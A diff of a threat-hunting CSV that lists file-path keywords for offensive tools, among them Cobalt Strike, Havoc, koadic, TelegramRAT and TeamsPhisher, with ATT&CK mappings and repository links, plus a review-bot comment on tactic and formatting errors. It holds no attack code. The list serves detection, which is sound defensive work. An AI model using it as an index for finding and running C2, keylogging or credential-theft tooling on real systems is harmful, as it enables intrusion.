Evasion","https://github.com/klezVirus/SysWhispers3","1","1","N/A","N/A","10","1006","148","2023-03-22T19:23:21Z","2022-03-07T18:56:21Z" -"*/syswhispersv2*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*/t3l3machus/Villain*","offensive_tool_keyword","Villain","Villain 
is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*/syswhispersv2*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*/t3l3machus/Villain*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" "*/taidoor.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*/TakeMyRDP*","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","3","278","56","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z" -"*/Talon.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" 
-"*/Talon/*Agent/Source*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*/Talon.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/Talon/*Agent/Source*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*/target:exe spacerunner.cs*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "*/targetedKerberoast*","offensive_tool_keyword","targetedKerberoast","Kerberoast with ACL abuse capabilities","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","Exploitation 
Tools","https://github.com/ShutdownRepo/targetedKerberoast","1","1","N/A","N/A","3","254","43","2023-07-16T22:06:29Z","2021-08-02T20:19:35Z" "*/targetedKerberoast.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" 
@@ -5540,25 +5600,26 @@ "*/Tash.dll*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/TashClient.*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/TashLoader.*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*/tccbypass.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/tccbypass.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/tcpshell.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" -"*/Teamphisher.txt*","offensive_tool_keyword","teamsphisher","Send phishing 
messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","831","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" -"*/Teamphisher/targets.txt*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","831","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" +"*/Teamphisher.txt*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","832","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" +"*/Teamphisher/targets.txt*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","832","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" +"*/teams_localdb.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/teamserver-linux.tar.gz*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/teamserver-win.zip*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/teamspeak2-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/teamstracker.db*","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","3","1","46","3","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" -"*/teamstracker.git*","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","3","1","46","3","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" -"*/teamstracker.py*","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","3","1","46","3","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" +"*/teamstracker.db*","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - 
T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","3","1","47","3","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" +"*/teamstracker.git*","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","3","1","47","3","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" +"*/teamstracker.py*","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","3","1","47","3","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" "*/TelegramRAT.git*","offensive_tool_keyword","TelegramRAT","Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions","T1071.001 - T1105 - T1027","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/machine1337/TelegramRAT","1","1","N/A","10","10","198","35","2023-08-25T13:41:49Z","2023-06-30T10:59:55Z" -"*/telnet_cdata_ftth_backdoor_userpass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/telnet_cdata_ftth_backdoor_userpass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/telnet-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/telnet-encryption.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/telnet-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/terminate/Terminator.sys*","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","3","266","53","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" "*/test32.dll*","offensive_tool_keyword","cobaltstrike","Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - 
T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tomcarver16/BOF-DLL-Inject","1","1","N/A","10","10","140","22","2020-09-03T23:24:31Z","2020-09-03T23:04:30Z" "*/test64.dll*","offensive_tool_keyword","cobaltstrike","Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/tomcarver16/BOF-DLL-Inject","1","1","N/A","10","10","140","22","2020-09-03T23:24:31Z","2020-09-03T23:04:30Z" -"*/tests/NIST_CAVS/*.rsp*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/tests/NIST_CAVS/*.rsp*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*/tests/test-bof.ps1*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" 
"*/tevora-threat/PowerView*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*/tftp-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
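Review bot: The added `*/teams_localdb.py*` row is categorised `Credential Access`, but its tactics field `TA0007 - TA0003 - TA0002 - TA0001` has no `TA0006`, so a consumer that filters or routes alerts by ATT&CK tactic will not surface this keyword under credential access. If the category is right, the tactics field should read `"TA0007 - TA0006 - TA0003 - TA0002 - TA0001"`; the technique list `T1069 - T1021 - T1136 - T1018` also looks like a tool-wide NetExec mapping rather than one specific to this module, and is worth confirming. Separately, the two metasploit rows rewritten in this hunk (`*/tccbypass.md*` and `*/telnet_cdata_ftth_backdoor_userpass.txt*`) still carry `T1204 -T1210` with a missing space, which would break any parser that splits the field on ` - `; `T1204 - T1210` fixes it.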
@@ -5566,17 +5627,17 @@ "*/TGSThief/*","offensive_tool_keyword","TGSThief","get the TGS of a user whose logon session is just present on the computer","T1558 - T1558.003 - T1078 - T1078.005","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/MzHmO/TGSThief","1","1","N/A","9","2","129","18","2023-07-25T05:30:39Z","2023-07-23T07:47:05Z" "*/tgtParse.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" 